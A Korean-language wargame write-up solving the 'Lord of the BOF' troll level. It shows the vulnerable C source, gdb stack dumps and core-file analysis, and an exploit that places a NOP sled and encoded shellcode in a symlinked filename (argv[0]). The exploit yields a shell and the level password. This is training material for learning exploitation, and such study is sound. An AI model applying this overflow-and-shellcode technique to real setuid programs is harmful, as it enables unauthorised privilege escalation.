orge -> troll

orge / timewalker

/*
        The Lord of the BOF : The Fellowship of the BOF
        - troll
        - check argc + argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
	char buffer[40];
	int i;

	// here is changed
	if(argc != 2){
		printf("argc must be two!\n");
		exit(0);
	}

	// egghunter 
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	strcpy(buffer, argv[1]); 
	printf("%s\n", buffer);

        // buffer hunter
        memset(buffer, 0, 40);

	// one more!
	memset(argv[1], 0, strlen(argv[1]));
}

argc=2이어야하기에 이번엔 argv[2]를 사용할 수 없다.

argv[1]을 이용해 buffer에 복사되는 40 bytes를 이용하고 싶어도 buffer를 후에 0으로 초기화하기 때문에 buffer에 쉘 코드를 저장해서 쉘 코드 주소로 retn 하려는 전략은 통하지가 않는다. 따라서 argv[0]을 이용해야한다.

argv[0]은 실행 파일명인데 앞 문제에서 사용한 심볼릭 링크를 사용해야한다. 대신 \x90과 쉘 코드로 구성된 파일명으로 심볼릭 링크를 사용한다.

우선 troll 실행파일을 TROLL로 복사하고 tmp 폴더를 하나 만들어서 tmp 디렉토리 내에서 TROLL 실행파일에 대한 심볼릭 링크를 만들었다.

[orge@localhost tmp]$ ln -s /home/orge/TROLL `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost tmp]$ ls -l
total 0
lrwxrwxrwx    1 orge     orge           16 Jan 23 17:07 ????????????????????????????????????????????????????????????????????????????????????????????????????龞1ɱ2?l?ÿ??羵󪀨쀿ÿ2i00tii0cjo?㐔?࿱?̿ -> /home/orge/TROLL

심볼릭 링크 파일을 대상으로 gdb를 실행했고 buffer 주소가 ebp-40임을 알았다. 40 bytes(buffer)+ 4 bytes(sfp)를 "A"로 저장하고 이어서 retn 주소는 0xbfbfbfbf로 설정해서 argv[1] 인자로 전달했다.

[orge@localhost tmp]$ gdb `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` -q
(gdb) b main
Breakpoint 1 at 0x8048506
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>:	push   %ebp
0x8048501 <main+1>:	mov    %ebp,%esp
(생략)
0x80485e6 <main+230>:	mov    %edx,DWORD PTR [%eax]
0x80485e8 <main+232>:	push   %edx
0x80485e9 <main+233>:	lea    %eax,[%ebp-40]
0x80485ec <main+236>:	push   %eax
0x80485ed <main+237>:	call   0x8048440 <strcpy>
0x80485f2 <main+242>:	add    %esp,8
(생략)
0x804863e <main+318>:	ret    
0x804863f <main+319>:	nop    
End of assembler dump.
(gdb) b *main+237
Breakpoint 2 at 0x80485ed
(gdb) r `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
Starting program: /home/orge/tmp/鐞1ɱ2lÿ瀵󬩪ÿÿÿ2i00tii0cjo㐔⚱
                                                            ΁ `python -c 'print "A"*44+"\xbf\xbf\xbf\xbf"'`
Xshell
Breakpoint 1, 0x8048506 in main ()
(gdb) c     
Continuing.

Breakpoint 2, 0x80485ed in main ()
(gdb) ni
0x80485f2 in main ()
(gdb) x/200x $ebp
0xbffff9b8:	0x41414141	0xbfbfbfbf	0x00000000	0xbffffa04
0xbffff9c8:	0xbffffa10	0x40013868	0x00000002	0x08048450
(생략)
0xbffffae8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffaf8:	0x00000000	0x69000000	0x00363836	0x6d6f682f
0xbffffb08:	0x726f2f65	0x742f6567	0x902f706d	0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffffb18:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb28:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb38:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb48:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb58:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffb68:	0x90909090	0x90909090	0x90909090	0xeb909090
0xbffffb78:	0xc9315e11	0x6c8032b1	0x8001ff0e	0xf67501e9
0xbffffb88:	0xeae805eb	0x32ffffff	0x306951c1	0x69697430
0xbffffb98:	0x6f6a6330	0x5451e48a	0xb19ae28a	0x0081ce0c
0xbffffba8:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbb8:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffbc8:	0x41414141	0x41414141	0x41414141	0xbfbfbfbf
0xbffffbd8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffbe8:	0x00000000	0x00000000	0x00000000	0x00000000

0xbffffb28을 retn 주소로 설정해서 심볼릭 링크 파일을 실행해본다.

[orge@localhost tmp]$ /home/orge/tmp/`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\x28\xfb\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(
Segmentation fault (core dumped)
[orge@localhost tmp]$ ls     
core
????????????????????????????????????????????????????????????????????????????????????????????????????龞1ɱ2?l?ÿ??羵󪀨쀿ÿ2i00tii0cjo?㐔?࿱?̿​

core dumped가 발생했고 gdb로 core를 들여다본다.

[orge@localhost tmp]$ gdb -c core -q
Core was generated by `/home/orge/tmp/'.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffff5e in ?? ()
(gdb) x/200x $esp
0xbffff8fc:	0x2f656d6f	0x00000000	0xbffff944	0xbffff950
0xbffff90c:	0x40013868	0x00000002	0x08048450	0x00000000
(생략)
0xbffffa0c:	0x00000010	0x0f8bfbff	0x0000000f	0xbffffa47
0xbffffa1c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa2c:	0x00000000	0x00000000	0x00000000	0x00000000
0xbffffa3c:	0x00000000	0x00000000	0x69000000	0x00363836
0xbffffa4c:	0x6d6f682f	0x726f2f65	0x742f6567	0x902f706d
---Type <return> to continue, or q <return> to quit---
0xbffffa5c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa6c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa7c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa8c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffa9c:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffaac:	0x90909090	0x90909090	0x90909090	0x90909090
0xbffffabc:	0xeb909090	0xc9315e11	0x6c8032b1	0x8001ff0e
0xbffffacc:	0xf67501e9	0xeae805eb	0x32ffffff	0x306951c1
0xbffffadc:	0x69697430	0x6f6a6330	0x5451e48a	0xb19ae28a
0xbffffaec:	0x0081ce0c	0x00000080	0x00000000	0x00000000
0xbffffafc:	0x00000000	0x00000000	0x00000000	0x00000000

0x90의 주소가 바뀌어있다. 0xbffffa6c로 retn 주소를 변경한다.

/home/orge로 돌아와서 심볼릭 링크를 동일하게 만든다음 retn 주소는 0xbffffa6c로 설정하여 실행한다.

[orge@localhost orge]$ ln -s troll `python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[orge@localhost orge]$ /home/orge/`python -c 'print "\x90"*100+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `python -c 'print "A"*44+"\x6c\xfa\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAl
bash$ my-pass
euid = 508
aspirin
bash$ exit

비밀번호는 aspirin이다.

참고로 core dumped가 발생해서 core 파일이 생성되어야 문제를 풀 수 있다. 그런데 원본 troll 실행파일을 대상으로 실행하면 아무리해도 core dumped 파일이 생성되지 않는다. 반드시 troll 실행파일의 복사본에 먼저 테스트해야 core dumped가 발생한다.